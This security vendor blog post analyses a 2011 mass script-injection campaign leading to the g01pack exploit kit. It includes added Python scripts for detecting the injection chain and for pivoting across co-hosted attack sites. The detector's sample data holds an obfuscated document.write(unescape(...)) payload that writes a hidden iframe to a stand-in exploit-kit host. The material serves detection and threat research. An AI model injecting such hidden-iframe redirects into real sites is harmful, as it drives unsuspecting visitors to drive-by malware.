April 18, 2011

Mass Injections Leading to g01pack Exploit Kit

Chris Astacio

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks.  Recently it detected a new injection attack that leads to an obscure Web attack kit.  The injection has three phases, which are covered in this blog post.  Websense customers are protected from this attack by ACE, our Advanced Classification Engine.

The first phase of the attack is a typical vector used by exploit kits to drive traffic to their sites: script injections.  HTML script code is placed on legitimate Web sites to drive traffic to the attack kits without the victim's knowledge.  In this case, legitimate sites are injected with malicious JavaScript.

Screen shot of malicious script injection (Phase 1):


In the second phase, this script injection then pulls obfuscated content from another site.  The obfuscated content creates an iframe that is used to pull content from the exploit kit site.  

Screen shot of the obfuscated redirect site used in the above injection (Phase 2):


Screen shot of the deobfuscated redirection site:


The exploit kit can basically be described as a drive-by download site, used in the third and final phase of this attack.  Its intent is to scan, attack, and run malicious code on the visitor's computer.  If one of the exploit kit's Web attacks succeeds, it can install malware intended to remotely control the victim's computer.  The binary that this kit tries to run on target computers is a Rogue AV installer with low antivirus detection.  As is typical, the exploit kit's Web attack code is obfuscated.


Screen shot of obfuscated exploit kit code (Phase 3):
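As an added illustration (not Websense code or ThreatSeeker output), the following Python script checks a crawled page for the three indicators that make up the chain described above: script sources on a third-party host (phase 1), redirector bodies built from obfuscation primitives such as unescape() and document.write() (phase 2), and hidden iframes, including ones that only appear after statically decoding an unescape() literal (phase 3). The hostnames, HTML and script bodies are constructed for the demonstration, and the scoring threshold is an assumption.

```python
"""Detect the three-phase injection chain (added example, not Websense code).

Given a crawled page and the bodies of the scripts it references, flag:
  phase 1 - <script src> tags pointing at a host other than the page's own,
  phase 2 - script bodies using several obfuscation primitives at once,
  phase 3 - hidden iframes, in the raw markup or inside unescape() literals.
All hostnames and markup below are constructed for the demonstration.
"""
import re
from urllib.parse import unquote, urlparse

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
IFRAME_TAG = re.compile(r'<iframe[^>]*>', re.I)
SRC_ATTR = re.compile(r'\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
UNESCAPE_LITERAL = re.compile(r'unescape\s*\(\s*["\']([^"\']*)["\']\s*\)', re.I)
# Zero-size, invisible or off-screen frames: the usual way an injected frame is hidden.
HIDDEN_ATTRS = re.compile(
    r'width\s*=\s*["\']?0\b|height\s*=\s*["\']?0\b|visibility\s*:\s*hidden'
    r'|display\s*:\s*none|left\s*:\s*-\d+', re.I)
# Each primitive is benign on its own; several together in a tiny script is the signal.
OBFUSCATION_PRIMITIVES = [
    re.compile(p, re.I) for p in
    (r'\beval\s*\(', r'\bunescape\s*\(', r'String\.fromCharCode', r'document\.write\s*\(')
]


def external_scripts(html, page_url):
    """Phase 1: script sources whose host differs from the page's host."""
    page_host = urlparse(page_url).hostname
    return [src for src in SCRIPT_SRC.findall(html)
            if urlparse(src).hostname not in (None, page_host)]


def obfuscation_score(js):
    """Phase 2: number of distinct obfuscation primitives present in a script body."""
    return sum(1 for p in OBFUSCATION_PRIMITIVES if p.search(js))


def js_unescape(literal):
    """Static equivalent of JavaScript unescape(): %uXXXX, then %XX sequences."""
    literal = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), literal)
    return unquote(literal)


def hidden_iframe_targets(markup):
    """Phase 3: src of every iframe hidden by size, style or position."""
    targets = []
    for tag in IFRAME_TAG.findall(markup):
        src = SRC_ATTR.search(tag)
        if src and HIDDEN_ATTRS.search(tag):
            targets.append(src.group(1))
    return targets


def analyse(page_url, html, script_bodies, min_score=2):
    """script_bodies maps each script src to the body a crawler fetched for it.
    min_score (assumed threshold) is how many primitives make a body 'obfuscated'."""
    findings = {"phase1_external_scripts": external_scripts(html, page_url),
                "phase2_obfuscated": [],
                "phase3_iframe_targets": hidden_iframe_targets(html)}
    for src in findings["phase1_external_scripts"]:
        body = script_bodies.get(src, "")
        score = obfuscation_score(body)
        if score >= min_score:
            findings["phase2_obfuscated"].append((src, score))
        # Look for the frame both in the raw body and in what unescape() would produce,
        # without ever executing the script.
        decoded = [js_unescape(lit) for lit in UNESCAPE_LITERAL.findall(body)]
        for markup in [body] + decoded:
            findings["phase3_iframe_targets"].extend(hidden_iframe_targets(markup))
    return findings


# Constructed samples (not real sites).
SAMPLE_PAGE_URL = "http://legit-site.example/index.html"
SAMPLE_HTML = ('<html><body><p>Welcome</p>'
               '<script src="/static/app.js"></script>'
               '<script src="http://redirector.example/js.js"></script>'
               '</body></html>')
SAMPLE_SCRIPTS = {
    # A phase-2 style redirector: document.write() of an unescape()d hidden iframe.
    "http://redirector.example/js.js":
        'document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fkit.example%2Fin.php%22'
        '%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));',
}

if __name__ == "__main__":
    for phase, hits in analyse(SAMPLE_PAGE_URL, SAMPLE_HTML, SAMPLE_SCRIPTS).items():
        print(phase, hits)
```

The decode step is deliberately static (percent-decoding the literal rather than evaluating the script), so the check can run over crawled content without executing anything the attacker wrote; in a real crawler, script_bodies would be filled by fetching each external source the page references.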


It's in cases like this that we can really harness the power of our ThreatSeeker® Network, not only to better protect our customers but also to perform further research into attacks!  With all of the scanning that ThreatSeeker® does, we get a large amount of data which we can correlate.  In this example, I can see all of the URLs associated with the IP address that this exploit kit was hosted on. 


Screen shot of URL report from hosting IP:


In the screen shot above, I've highlighted that there are a number of URLs with an "/admin/" directory.  Assuming that these are the same attack kits hosted on this IP, I can try to see if our attack host has the same page.  Sure enough, the attack site discussed in this blog follows the convention of other sites hosted on this IP.
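The pivot described above, as an added example (not ThreatSeeker code): given URL telemetry that records the IP each URL was served from, the script indexes the first path segment of every URL per host and then reports which other hosts on the same IP share a path convention with a known attack host, the way the "/admin/" directory was used here. The records and IPs are constructed (documentation address ranges), and the record layout is an assumption.

```python
"""Pivot from one attack host to its neighbours on the same IP (added example,
not ThreatSeeker code).  Records are (url, hosting_ip) pairs; the IP and URLs
below are constructed for the demonstration.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed telemetry, not real ThreatSeeker data.
RECORDS = [
    ("http://kit-a.example/in.php?e=1", "203.0.113.10"),
    ("http://kit-a.example/admin/", "203.0.113.10"),
    ("http://kit-b.example/admin/index.php", "203.0.113.10"),
    ("http://kit-b.example/in.php", "203.0.113.10"),
    ("http://kit-c.example/admin/", "203.0.113.10"),
    ("http://blog-on-shared-host.example/2011/04/post.html", "203.0.113.10"),
    ("http://shop.example/cart", "198.51.100.7"),
]


def first_segment(url):
    """'/admin/index.php' -> 'admin'; '/' -> ''."""
    return urlparse(url).path.strip("/").split("/", 1)[0]


def index_by_ip(records):
    """ip -> host -> set of first path segments seen on that host."""
    index = defaultdict(lambda: defaultdict(set))
    for url, ip in records:
        index[ip][urlparse(url).hostname].add(first_segment(url))
    return index


def shared_conventions(records, known_host):
    """For every IP the known host was seen on, return the other hosts there and
    the path segments they share with it: {ip: {host: [segments...]}}."""
    index = index_by_ip(records)
    result = {}
    for ip, hosts in index.items():
        if known_host not in hosts:
            continue
        known_segments = hosts[known_host]
        for host, segments in hosts.items():
            if host == known_host:
                continue
            shared = sorted(known_segments & segments)
            if shared:  # a shared-hosting neighbour with unrelated paths is not reported
                result.setdefault(ip, {})[host] = shared
    return result


if __name__ == "__main__":
    for ip, hosts in shared_conventions(RECORDS, "kit-a.example").items():
        for host, shared in sorted(hosts.items()):
            print(f"{ip}  {host:<24} shares {shared} with kit-a.example")
```

Only hosts that actually share a path segment with the known attack host are reported, so an unrelated site that merely sits on the same shared IP (the blog in the sample) does not get flagged on co-hosting alone.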


Screen shot of the attack kit admin page:


Notice the title on the admin page: it contains an email address for a group known as the Iranian Cyber Army.  This is a known attribute of a kit called the g01pack malware tool.  We were able to access the admin panel and confirm that this site is hosting an installation of the g01pack malware tool.


Screen shot for g01pack admin statistics for this attack:



We are aware that the g01pack admin panel is in fact a fake honeypot tool used by attackers.  This admin "tool" is used to track researchers who try to access admin panels for attack kits, an interesting tactic.  However, the threat described in this blog is very real, and we are seeing other attack hosts on the same IP attacking visitors.  Because those other hosts on this IP also serve the fake admin panel, we treat them as exploit kit attack code as well, usable in the same script injection attacks and in other injection attacks.  Thanks @briankrebs for getting in touch with us to clarify this post.
